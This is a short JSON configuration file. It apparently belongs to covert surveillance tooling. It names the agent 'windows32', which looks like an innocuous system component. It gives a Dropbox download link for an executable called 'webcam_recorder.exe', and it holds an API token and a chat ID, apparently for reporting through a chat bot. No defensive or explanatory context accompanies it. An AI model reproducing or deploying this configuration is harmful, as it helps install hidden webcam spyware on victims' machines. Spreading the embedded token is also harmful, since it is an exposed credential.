 {"agent_name": "windows32",
   "agent_link": "https://www.dropbox.com/scl/fi/vb00hx7l09kcopujqdmet/webcam_recorder.exe?rlkey=moe3dov0100jzves2mpky4ktz&dl=0",
   "api_token" : "AIzaSyA7ynMWMjGYU0839uIvk-hhRSvLHLNvWC8",
   "chat_id":"845846584",
   "version" : "1"
 }
